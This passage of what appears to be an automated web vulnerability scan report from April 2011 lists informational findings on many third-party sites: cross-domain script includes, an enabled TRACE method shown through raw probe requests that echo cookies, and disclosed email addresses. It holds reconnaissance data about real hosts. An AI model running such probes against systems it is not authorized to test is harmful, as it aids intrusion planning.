http://static.woopra.com/js/woopra.js
http://www.google-analytics.com/urchin.js

Request

GET /products.html HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Referer: http://www.outpost24.com/?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjImMiYzNjM4NDYmMTMwMzczMjgxODc3OCYxMzAzNzM2MDY4MzgwJiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:40 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 13355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...

23.72. http://www.stillsecure.com/company/testimonials.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/company/testimonials.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET /company/testimonials.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/library/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.4.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:04 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.73. http://www.stillsecure.com/library/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/library/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET /library/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=request-a-trial&product=VAM
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.3.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:03 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.74. http://www.stillsecure.com/m/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

Response

23.75. http://www.stillsecure.com/products.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/products.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET /products.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/services/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.6.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:08 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network Security Products | Secure Networ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.76. http://www.stillsecure.com/services/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/services/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET /services/index.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.5.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:06 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Managed Security Services | Monitoring |
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.77. http://www.stillsecure.com/vam/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/vam/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js

Request

GET /vam/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.1.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:10 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Vulnerability Management System | Network
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.78. http://www.tresware.com/Static-contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/Static-contact.html

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/?file=api&v=2&key=ABQIAAAAa9ZgLcup1atRScDnQZtsDxSRUe5SW-hZPzm6ZYpOuWXDOrFWMxRZ7jZ--8AFfSi7D6c-kDHI8ZVQ7g

Request

Response

24. TRACE method is enabled previous next
There are 11 instances of this issue:

http://games.webalta.ru/
http://pixel.fetchback.com/
http://pixel.rubiconproject.com/
http://pl.yumenetworks.com/
https://store.manageengine.com/
http://widgets.digg.com/
http://www.igotyourindex.com/
https://www.manageengine.com/
http://www.smpone.com/
http://www.stillsecure.com/
http://www.tresware.com/

24.1. http://games.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.webalta.ru
Path:	/

Request

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d

24.2. http://pixel.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27

24.3. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

24.4. http://pl.yumenetworks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e
X-Forwarded-For: 173.193.214.243

24.5. https://store.manageengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.manageengine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da

24.6. http://widgets.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 3c84da3aceb8a596

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:07:30 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3c84da3aceb8a596
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.33
x-chpd-loop: 1
Via: 1.0 PXY020-ASHB.COTENDO.NET (chpd/3
...[SNIP]...

24.7. http://www.igotyourindex.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.igotyourindex.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca

24.8. https://www.manageengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b

24.9. http://www.smpone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.smpone.com
Cookie: 7fd91fd5f1b454f7

Response

24.10. http://www.stillsecure.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:11 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51

24.11. http://www.tresware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.tresware.com
Cookie: e820d3df4b13e88f

Response

25. Email addresses disclosed previous next
There are 41 instances of this issue:

http://customer.kronos.com/EdServices/tooltip.js
http://direct.yandex.ru/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js
http://l-stat.livejournal.com/js/
http://learn.shavlik.com/shavlik/
http://learn.shavlik.com/shavlik/download.cfm
http://learn.shavlik.com/shavlik/index.cfm
http://mail.ru/
http://solutions.kronos.com/forms/experience2011
http://tengrinews.kz/static/js/browserTouchSupport.js
http://tengrinews.kz/static/js/jquery.cookie.js
http://tools.manageengine.com/forums/me/forum.php
http://tools.manageengine.com/forums/security-manager/forum.php
http://www.criticalwatch.com/company/critical-watch-career.aspx
http://www.criticalwatch.com/company/critical-watch-contact.aspx
http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
http://www.criticalwatch.com/support/critical-watch-support.aspx
http://www.depthsecurity.com/
http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
https://www.depthsecurity.com/company.aspx
https://www.depthsecurity.com/contact-us.aspx
https://www.depthsecurity.com/professional-services.aspx
https://www.depthsecurity.com/services.aspx
http://www.gartner.com/technology/contact/become-a-client.jsp
http://www.gartner.com/technology/contact/contact_gartner.jsp
http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
http://www.manageengine.com/me_partners.html
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
http://www.netsuite.com/portal/javascript/DD_roundies.js
http://www.praetorian.com/contactus.html
http://www.smpone.com/Static-contact.html
http://www.smpone.com/javascript/common.php
http://www.stillsecure.com/m/
http://www.tresware.com/javascript/bbcode.php
http://www.tresware.com/javascript/common.php
http://www.trucklist.ru/cars/&rnd=7005287
http://www.trucklist.ru/cars/trucks
http://www.trucklist.ru/cars/undefined
http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js

25.1. http://customer.kronos.com/EdServices/tooltip.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://customer.kronos.com
Path:	/EdServices/tooltip.js

Issue detail

The following email address was disclosed in the response:

migoicons@hotmail.com

Request

GET /EdServices/tooltip.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: customer.kronos.com

Response

HTTP/1.1 200 OK
Content-Length: 7384
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Mar 2008 19:41:19 GMT
Accept-Ranges: bytes
ETag: "5d378732b08ec81:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 13:53:52 GMT

...<!--
/*
Pleas leave this notice.
DHTML tip message version 1.5.4 copyright Essam Gamal 2003
Home Page: (http://migoicons.tripod.com)
Email: (migoicons@hotmail.com)
Updated on :7/30/2003
*/

var MI_IE=MI_IE4=MI_NN4=MI_ONN=MI_NN=MI_pSub=MI_sNav=0;mig_dNav()
var Style=[],Text=[],Count=0,move=0,fl=0,isOK=1,hs,e_d,tb,w=window,PX=(MI_pSub)?"px":""
var d_r=(MI
...[SNIP]...

25.2. http://direct.yandex.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The following email address was disclosed in the response:

support@direct.yandex.ru

Request

Response

25.3. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The following email address was disclosed in the response:

gm12345@MyCompany.com

Request

Response

25.4. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The following email address was disclosed in the response:

gm12345@MyCompany.com

Request

Response

25.5. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.en25.com
Path:	/Web/KronosIncorporated/astadia-gated-forms-ver-3.js

Issue detail

The following email address was disclosed in the response:

yensamg@gmail.com

Request

GET /Web/KronosIncorporated/astadia-gated-forms-ver-3.js HTTP/1.1
Host: img.en25.com
Proxy-Connection: keep-alive
Referer: http://solutions.kronos.com/forms/experience2011
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 02:15:10 GMT
Accept-Ranges: bytes
ETag: "fb74f6d89f41cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 16182
Cache-Control: max-age=3600
Date: Mon, 25 Apr 2011 14:22:27 GMT
Connection: close

/* PRE-DFINED VARIABLES */
// v_email
// c_email
// c_isRegistered

// elqCookieDLKey
// elqContactDLKey
// elqProspectDLKey

// g_redir_host
// g_short_form_uri
// g_long_form_uri

//
...[SNIP]...
yle.left = '-1000px';

document.body.appendChild(io);

return io
}

/***************************/
//@Author: Adrian "yEnS" Mato Gondelle
//@website: www.yensdesign.com
//@email: yensamg@gmail.com
//@license: Feel free to use it, but keep this credits please!
/***************************/

//SETTING UP OUR POPUP
//0 means disabled; 1 means enabled;
var popupStatus = 0;

//loading p
...[SNIP]...

25.6. http://l-stat.livejournal.com/js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l-stat.livejournal.com
Path:	/js/

Issue detail

The following email address was disclosed in the response:

sergey.zhirkov@sup.com

Request

GET /js/??jquery/jquery.ui.core.min.js,jquery/jquery.ui.widget.min.js,jquery/jquery.lj.bubble.js,contextualhover.js,stats.js,widgets/qotd.js,widgets/journalspotlight.js,widgets/photos2homepage.js,widgets/potd.js,widget_ippu/addvgift.js,widget_ippu/vgiftsmspay.js,widgets/shopvgift.js,inputcomplete.js,settingprod.js,widget_ippu/settingprod.js,horizon.js?v=1302809072 HTTP/1.1
Host: l-stat.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Perlbal
Content-Type: application/x-javascript
Cache-Control: public, max-age=31536000
ETag: HlATaNEjXLJzuO3FK0MglA
Vary: Accept-Encoding
Age: 930710
Date: Mon, 25 Apr 2011 14:29:19 GMT
Last-Modified: Thu, 14 Apr 2011 19:24:32 GMT
Expires: Fri, 13 Apr 2012 20:11:15 GMT
Connection: keep-alive
Content-Length: 74792

/*!
* jQuery UI 1.8.10
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.co
...[SNIP]...
a];c[f]=c.originalEvent[f]}}this.element.trigger(c,d);return!(b.isFunction(e)&&e.call(this.element[0],c,d)===false||c.isDefaultPrevented())}}})(jQuery);
/*!
* LiveJournal Bubble
*
* Copyright 2011, sergey.zhirkov@sup.com
*
* http://docs.jquery.com/UI
*
* Depends:
*    jquery.ui.core.js
*    jquery.ui.widget.js
*
* Usage:
*    <script>
...[SNIP]...

25.7. http://learn.shavlik.com/shavlik/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/

Issue detail

The following email address was disclosed in the response:

sales@shavlik.com

Request

GET /shavlik/ HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...

25.8. http://learn.shavlik.com/shavlik/download.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/download.cfm

Issue detail

The following email address was disclosed in the response:

sales@shavlik.com

Request

GET /shavlik/download.cfm?nFileID=407 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.4.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<div id=footer>Shavlik Technologies, LLC | Privacy Policy | Direct: (800) 690-6911, (651) 426-6624; Fax: (651) 426-3345; Support: (866) 407-5279; Email: sales@shavlik.com</div>
...[SNIP]...

25.9. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The following email addresses were disclosed in the response:

info@shavlik.com
sales@shavlik.com

Request

GET /shavlik/index.cfm?pg=341 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
